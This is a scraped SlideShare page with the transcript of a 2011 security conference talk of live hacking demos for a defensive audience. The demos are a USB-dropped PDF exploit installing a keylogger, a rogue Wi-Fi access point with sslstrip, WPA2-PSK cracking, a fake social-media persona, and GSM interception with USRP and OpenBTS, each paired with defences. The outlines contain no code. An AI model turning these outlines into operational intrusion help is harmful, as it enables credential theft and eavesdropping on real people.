Your SlideShare is downloading. ×
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
ECSA Cyber Security Conference 2011
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

ECSA Cyber Security Conference 2011

689

Published on

A session of Live Hacking demonstrations at the ECSA Cyber Security Conference 2011 (Belgium) to law enforcement and private community.

A session of Live Hacking demonstrations at the ECSA Cyber Security Conference 2011 (Belgium) to law enforcement and private community.

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
689
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. ECSA  Cyber  Security  Conference  2011  Some  hands-­‐on  threat  demonstra.ons    Cyber  Security  2011  (13-­‐Dec-­‐2011)        Filip  Maertens  Avydian  Cyber  Defense   Cyber  Defense  Group  
  • 2. Agenda  ➤  Demo  1:  The  Curious  Case  of  Benjamin  BuGon  ➤  Demo  2:  Thanks  for  the  free  Wi-­‐Fi  ➤  Demo  3:  Hm.  Now,  I  need  free  Wi-­‐Fi    ➤  Demo  4:  Social  Engineering  on  social  networks  ➤  Demo  5:  IntercepTng  GSM  networks   Cyber  Defense  Group  
  • 3. About  the  speaker  ➤  Cybercrime  invesTgator  and  tacTcal  cyber  security  advisor  ➤  Head  of  Cyber-­‐Security  at  European  Corporate  Security  AssociaTon  ➤  CISSP,  CISM,  CISA,  CPO,  CFE  …  and  CCSP  (“cer.fied  common  sense  prac..oner”)  ➤  MSc.  InformaTon  Risk  and  BSc.  InformaTon  OperaTons  ➤  Mobile  aficionado  (building  mobile  channels  for  Fortune  500  banks)   Cyber  Defense  Group  
  • 4. Demo  1  –  The  Curious  Case  of  Benjamin  BuBon     (or  how  curiosity  killed  the  cat)   Cyber  Defense  Group  
  • 5. The  ABack  -­‐  PreparaDon  ➤  Prepare  a  USB  with  a  maliciously  cra[ed  file  and   drop  it  somewhere.    Then  wait.  ➤  ExploitaTon  of  human  weakness  ➤  ExploitaTon  of  system  weakness   Cyber  Defense  Group  
  • 6. The  ABack  –  PreparaDon  (2/2)  ➤  Make  a  good  payload:   ➤  Obfuscated  key-­‐logger     ➤  Adobe  Acrobat  Reader  10.x   0day  exploit  (PDF)  ➤  Once  the  Acrobat  is   exploited,  our  key-­‐logger  is   silently  installed   Cyber  Defense  Group  
  • 7. The  ABack  –  ExecuDon  (Step  1)   Cyber  Defense  Group  
  • 8. The  ABack  –  ExecuDon  (Step  2)  Live  Demo:  Silent  install  of  key-­‐logger   Cyber  Defense  Group  
  • 9. Defending  against  the  aBack  ➤  Don’t  take  candy  from  a  stranger:   ➤  Always  approach  unknown  storage  hardware   with  great  cauTon   ➤  Do  not  open  files  (seriously)   ➤  …  and  if  you  must,  open  it  in  an  isolated  test   environment  ➤  PracTce  sound  personal  system  security   pracTces   Cyber  Defense  Group  
  • 10. Demo  2  –  Thanks  for  the  free  Wi-­‐Fi!    (or,  if  something  looks  to  be  good  to  be  true…  it  usually  is)   Cyber  Defense  Group  
  • 11. The  ABack  -­‐  PreparaDon  ➤  Prepare  a  rogue  access  point:   ➤  Deny  access  to  exis.ng  Access  Point   ➤  Set  up  your  own  Access  Point  (with  sslstrip)   ➤  Intercept  all  traffic  going  over  the  wire  ➤  ExploitaTon  of  human  weakness  ➤  ExploitaTon  of  system  weakness   Cyber  Defense  Group  
  • 12. The  ABack  –  ExecuDon  Live  Demo:  Capture  usernames  +  passwords  of  a  user   Cyber  Defense  Group  
  • 13. Defending  against  the  aBack  ➤  Never  assume  (“it  makes  an  ass  of  u  and  me”):   ➤  Always  ask  for  the  SSID  of  the  Hotel  or  public  area    ➤  Be  vigilant  /  aware  of  abnormal  behavior:   ➤  Someone  in  a  parked  car  with  a  laptop   ➤  Unusual  slow  Internet  access   ➤  Abnormal  traceroute  paths   ➤  Abnormal  SSL  cerTficates  presented  (or  broken  cerTficates)   ➤  Automated  connects  aren’t  automated  any  more   Cyber  Defense  Group  
  • 14. Demo  3  –  Hm.  Now,  I  need  free  Wi-­‐Fi!     (wireless  hacking  for  fun  and  profit)   Cyber  Defense  Group  
  • 15. The  ABack  -­‐  PreparaDon  ➤  Set  up  a  Linux  machine  with  a  wireless  card  ➤  Put  network  card  in  promiscuous  mode,  so  it   starts  to  listen  to  all  wireless  traffic  around  you  ➤  Capture  all  traffic  and  do  this  unTl  you  have   capture  a  WPA  Handshake  session.  ➤  Decode  the  passphrase  (PSK)  by  doing  offline   cracking.   Cyber  Defense  Group  
  • 16. The  ABack  –  ExecuDon  Live  Demo:  Hack  an  Access  Point  (WPA2-­‐PSK)   Cyber  Defense  Group  
  • 17. Defending  against  the  aBack  ➤  Don’t  use  Pre-­‐Shared  Key  protecTon:   ➤  But  if  you  have  no  choice,  make  it  extremely  long  (  >  35  chars)   ➤  Change  the  PSK  every  month  or  quarter   ➤  Change  the  SSID  to  a  non-­‐default  SSID   ➤  Don’t  use  WPA2-­‐TKIP,  but  WPA2-­‐AES  ➤  Monitor  your  Internet  usage  to  check  for  excessive   bandwidth  usage.  ➤  Have  a  firewall  between  the  AP  and  your  network.   Cyber  Defense  Group  
  • 18. Demo  4  –  Social  Engineering  on  Social  Networks     (trying  to  score  a  date  with  Sophie  Draufster)   Cyber  Defense  Group  
  • 19. The  ABack  -­‐  PreparaDon  ➤  Back  in  2010:  Sophie  Draufster  was  born  on   Facebook  and  LinkedIn  ➤  Reason  for  existence:  Social  engineering  of   execuTves  of  large  consulTng  firms  ➤  Results:   ➤  Facebook  Friends:  105   ➤  LinkedIn  Requests:  133   ➤  Divulging  of  confidenTal  informaTon:  73   ➤  Explicit  date  requests:  33   Cyber  Defense  Group  
  • 20. The  ABack  -­‐  Results   Cyber  Defense  Group  
  • 21. Defending  against  the  aBack  ➤  Be  vigilant  and  know  who  you  are  talking  to:   ➤  Why  would  a  (gorgeous  looking)  stranger  befriend  you  ?   ➤  Never  post  /  talk  /  tweet  /  …  classified  business   ➤  Be  trained  to  detect  social  engineering  aGacks  (paranoia   can’t  hurt)  ➤  Claim  your  own  idenTty  (before  someone  else  does)  ➤  Social  networks  only  for  offline  trusted  friends   Cyber  Defense  Group  
  • 22. Demo  5  –  IntercepDng  GSM  networks    (build  your  own  tacTcal  intercepTon  device)   Cyber  Defense  Group  
  • 23. The  ABack  -­‐  PreparaDon   Trixie  ➤  Become  your  own  operator:   R/TFX900   Priceless   175  USD   ➤  Universal  So[ware  Radio  Peripheral   ➤  GNUradio  Project   ➤  OpenBTS  /  OpenBSC  /  SMSqueue   USRP   800  USD   ➤  OsmocomBB   ➤  Asterisk   52  Mhz  ➤  Under  1,500  USD  you  cover  up  to   37  USD   300  m  of  GSM  signal  (indoor)  +  2   channels  (850/900/1800/1900).   Cyber  Defense  Group  
  • 24. The  ABack  -­‐  Background  (1/2)  ➤  GSMA  is  not  too  worried,  though  :   “  …  intercept  approach  has  underesDmated  its  pracTcal  complexity   A  hacker  would  need  a  radio  receiver  system  and  the  signal  processing     so]ware  necessary  to  process  the  raw  radio  data.  CSMA,  Aug  2009   ✓  UnderesDmated  complexity:  Ability  to  decrypt  A5  family  in  (near)  real  Tme  (2009)   ✓  UnderesDmated  complexity:  IMSI  catching,  bypass  A3/A8,  …  (2010)   ✓  Radio  receiver  system:  USRP  /  USRP2  +  GNUradio  +  OpenBTS  (you  know,  the  so]ware)   Cyber  Defense  Group  
  • 25. The  ABack  -­‐  Background  (2/2)   If  it  looks  like  a  duck   ,  walks  like  a  duck   ,  talks  like  a  duck   =   it’s  a  duck  !   ?  MCC=206,  MNC=020   Handset  registers  to  who  ?   This  is  where  you  do  “Hello”   Cyber  Defense  Group  
  • 26. The  ABack  –  ExecuDon  Disclaimer  –  Only  used  for  test  and  protocol  analysis  purposes.  No  real  operator  MMC  or  MNC  data,  frequencies  and  spectrum  used.  No  operator  BTS,  BSC  or  HLR  infrastructure  is  (ab)used.    Live  Demo:  IntercepDon  of  SMS  Live  Demo:  IntercepDon  of  Voice  Call   Cyber  Defense  Group  
  • 27. The  ABack  –  Summary   OTP  over  SMS   Insecure     Making  calls   Insecure     Cyber  Defense  Group  
  • 28. Defending  against  the  aBack  ➤  Sudden  and/or  repeated  network  signal  loss  ➤  Sudden  3G  data  loss  (where  it  is  abnormal)  ➤  Cryptographic  voice  streaming  over  3G  (A5.3)  ➤  Sudden  downgrade  from  A5.1  to  A5.0/A5.2  ➤  …  but  passive  intercepTon  =>  undetectable  from  handheld   Cyber  Defense  Group  
  • 29. Taking  it  to  an  non-­‐defendable  level   Cyber  Defense  Group  
  • 30. ECSA  Cyber  Security  Conference  2011  Some  hands-­‐on  threat  demonstra.ons    Cyber  Security  2011  (13-­‐Dec-­‐2011)        Filip  Maertens  filip.maertens@avydian.com   Cyber  Defense  Group  

×